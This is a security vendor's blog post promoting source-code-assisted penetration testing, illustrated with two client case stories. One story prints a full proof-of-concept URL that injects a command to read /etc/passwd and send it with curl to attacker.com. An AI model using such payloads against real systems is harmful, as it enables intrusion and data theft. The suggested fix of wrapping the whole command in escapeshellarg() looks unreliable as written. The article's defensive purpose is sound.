Why You Should Consider a Source Code Assisted Penetration Test
In almost every industry, client-provider relationships look for win-win scenarios. For some, a win-win is as simple as a provider getting paid and the client getting value out of the money they paid for the service or product. While delivering high-quality services is certainly a big win, there are many opportunities in the pentesting space to win even bigger from the perspective of both the client and the provider. Enter: source code assisted penetration testing.
Here’s the TL;DR of this article in a quick bullet list:
5 reasons why you should consider doing a source code assisted pentest?
- More thorough results
- More comprehensive testing
- More vulnerabilities discovered
- No added cost
- Much more specific remediation guidance for identified vulnerabilities
Not convinced? Let’s take a deeper dive into why you should choose a source code assisted pentest over a black-box or grey-box pentest.
Cost
We should probably get this out of the way first. To make a long story short, there’s no extra cost to do source code assisted penetration testing with NetSPI. This is a huge win, but it is by no means the only benefit of a source code assisted pentest. We’ll discuss the benefits in greater detail below.
Black-box vs. grey-box vs. white-box penetration testing
Penetration testing is typically performed from a grey-box or black-box perspective. Let’s define some of these terms:
Black-box: This means that the assessment is performed from the perspective of a typical attacker on the internet. No special access, documentation, source code, or inside knowledge is provided to the pentester in this type of engagement. This type of assessment emulates a real-world attacker scenario.
Grey-box: This means that the assessment is performed with limited knowledge of the inner workings of the application (usually given to the tester through a demo of the application). Access is typically granted to the testers by providing non-public access to the application in the form of user or admin accounts for use in the testing process. Grey-box is the typical perspective of most traditional pentests.
White-box: This is where source code assisted pentests live. This type of assessment includes everything that a grey-box one would have but adds onto it by providing access to the application’s source code. This type of engagement is far more collaborative. The pentester often works with the application architects and developers to gain a better understanding of the application’s inner workings.
Many come into a pentest with the desire to have a black-box pentest performed on their application. This seems very reasonable when you put yourself in their shoes, because what they’re concerned about is ultimately the real-world attacker scenario. They don’t expect an attacker to have access to administrative accounts, or even customer accounts. They also don’t expect an attacker to have access to their internal application documentation, and certainly not to the source code. These are all very reasonable assumptions, but let’s discuss why these assumptions are misleading.
Never assume your user or admin accounts are inaccessible to an attacker
If you want an in-depth discussion on how attackers gain authenticated access to an application, go read this article on our technical blog, Login Portal Security 101. In summary, an attacker will almost always be able to get authenticated access into your application as a normal user. At the very least, they can usually go the legitimate route of becoming a customer to get an account created, but typically this isn’t even necessary.
Once the authentication boundary has been passed, authorization bypasses and privilege escalation vulnerabilities are exceedingly common findings even in the most modern of applications. Here’s one (of many) example on how an attacker can go from normal user to site admin: Insecurity Through Obscurity.
Never assume that your source code is inaccessible to an attacker
We’ve encouraged clients to choose source code assisted pentesting for some time now, but there are many reasons why organizations are hesitant to give out access to their source code. Most of these concerns are for the safety and privacy of their codebase, which contains highly valuable intellectual property. These are valid concerns, and it’s understandable to wait until you’ve established a relationship of trust before handing over your crown jewels. In fact, I recommend this approach if you’re dealing with a company whose reputation and integrity you cannot verify. However, let me demonstrate why source code assisted pentests are so valuable by telling you about one of our recent pentests:
Customer A did not provide source code for an assessment we performed. During the engagement, we identified a page that allowed file uploads. We spent some time testing how well they had protected against uploading potentially harmful files, such as .aspx, .php, .html, etc. This endpoint appeared to have a decent whitelist of allowed files and wouldn’t accept any malicious file uploads that we attempted. The endpoint did allow us to specify certain directories where files could be stored (instead of the default locations) but was preventing uploads to many other locations. Without access to the source code handling these file uploads, we spent several hours working through different tests to see what we could upload, and to where. We were suspicious that there was a more significant vulnerability within this endpoint, but eventually moved on to testing other aspects of the application given the time constraints of a pentest.
A few days later, we discovered another vulnerability that allowed us to download arbitrary files from the server. Due to another directory traversal issue, we were finally able to exfiltrate the source code that handled the file upload we had been testing previously. With access to the source, we quickly saw that they had an exception to their restricted files list when uploading files to a particular directory. Using this “inside knowledge” we were able to upload a webshell to the server and gain full access to the web server. This webshell access allowed us to… you guessed it… view all their source code stored on the web server. We immediately reported the issue to the client and asked whether we could access the rest of the source code stored on the server. The client agreed, and we discovered several more vulnerabilities within the source that could have been missed if we had continued in our initial grey-box approach.
Attackers are not bound by time limits, but pentesters are
The nature of pentesting requires that we only spend a predetermined amount of time pentesting a particular application. The story above illustrates how much valuable time is lost when pentesters have to guess what is happening on the server-side. Prior to having the source code, we spent several hours going through trial and error in an attempt to exploit a likely vulnerability. Even after all that time, we didn’t discover any particularly risky exploit and could have passed this over as something that ultimately wasn’t vulnerable. However, with a 5-minute look at the code, we immediately understood what the vulnerability was, and how to exploit it.
The time savings alone is a huge win for both parties. Saving several hours of guesswork during an assessment that lasts only 40 hours is extremely significant. You might be saying, “but if you couldn’t find it, that means it’s unlikely someone else would find it… right?” True, but “unlikely” does not mean “impossible.” Would you rather leave a vulnerability in an application when it could be removed?
Let’s illustrate this point with an example of a successful source code assisted penetration test:During a source code assistedpentest, we discovered an endpoint that did not show up in our scans, spiders, or browsing of the application. By looking through the source code, we discovered that the endpoint could still be accessed if explicitly browsed to and determined the structure of the request accepted by this “hidden” endpoint.
The controller took a “start_date” and “end_date” from the URL and then passed those variables into another function that used them in a very unsafe manner:
This php file used the unfiltered, unmodified, un-sanitized parameters directly in a string that was used in a “shell_exec()” function call. This function is executed at the system level and resulted in command injection on the server. As a proof of concept, we made the following request to the server and were able to exfiltrate the contents of /etc/passwd to an external server: https://redacted.com/redacted/vulnpath?start_date=2017-07-16|echo%20%22cmd=cat%20/etc/passwd%22%20|%20curl%20-d%20@-%20https%3a%2f%2fattacker.com%2flog%20%26
In layman’s terms: An attacker is essentially able to run any code they want on the server with this vulnerability, which could lead to full host or even network compromise.
With a vulnerability this significant, you should be wondering why this endpoint never showed up in any of our black-box or grey-box pentesting. Well, the answer is that this particular endpoint was supposed to only be used by a subset of the client’s customers. The testing accounts we were given did not include the flag to show this endpoint. Had this been a pentest without access to source code this would almost certainly have been missed, and the command injection vulnerability would still be sitting in the open customer accounts that could see this endpoint. After fixing this vulnerability, the client confirmed that no one had already exploited it and breathed a huge sigh of relief.
On the other hand, the client in our first example had a far different outcome. Even though the company immediately fixed the vulnerability in the latest version of the product, they failed to patch previously deployed instances and those instances were hacked months later. A key portion of the hacker’s exploit chain was the file upload vulnerability we had identified using the source code.
Had we not discovered the vulnerability and disclosed it to them, the hack would have been much worse. Perhaps the attackers used the same methodology we did to exploit the vulnerability, but it’s just as likely that they used another method of discovering a working exploit against that file upload. This is a perfect example of why source code assisted pentests should be your go-to solution when performing a pentest. We discovered the vulnerability months ahead of them getting hacked because we had access to the source code. If they had properly mitigated the vulnerability, they could have potentially avoided an exceptionally costly hack.
Specific Remediation Guidance
To close out this post, I want to highlight how much more specific the remediation guidance can be when we’re performing a source code assisted pentest as opposed to one without source code. Here’s an example of the remediation guidance given to a client with the vulnerable php script:
Employ the use of escapeshellarg() in order to prevent shell arguments from being included into the argument string. Specifically, change line 47 to this:
$output = shell_exec(escapeshellarg($scriptOgcJs));
Additionally, the startDate and endDate parameters should be validated as real dates on line 26 of the examplecontroller.php page. It is recommended that you implement the php checkdate function as a whitelist measure to prevent anything other than a well-formatted date from being used in sensitive functions. Reference: https://www.php.net/manual/en/function.checkdate.php
Without access to the source code, we are only able to give generic guidance for remediation steps. With the source code, we can recommend specific fixes that should help your developers more successfully remediate the identified vulnerabilities.